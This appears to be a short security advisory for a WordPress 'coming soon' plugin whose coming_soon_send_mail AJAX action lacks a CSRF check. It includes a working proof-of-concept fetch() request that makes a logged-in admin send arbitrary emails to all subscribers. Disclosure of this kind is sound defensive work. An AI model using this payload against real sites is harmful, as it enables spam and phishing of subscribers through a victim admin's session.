The plugin does not have CSRF check in its coming_soon_send_mail AJAX action, allowing attackers to make logged in admin to send arbitrary emails to all subscribed users via a CSRF attack
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=coming_soon_send_mail&massage_title=title&massage_description=description&massage_from_name=from&[email protected]",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));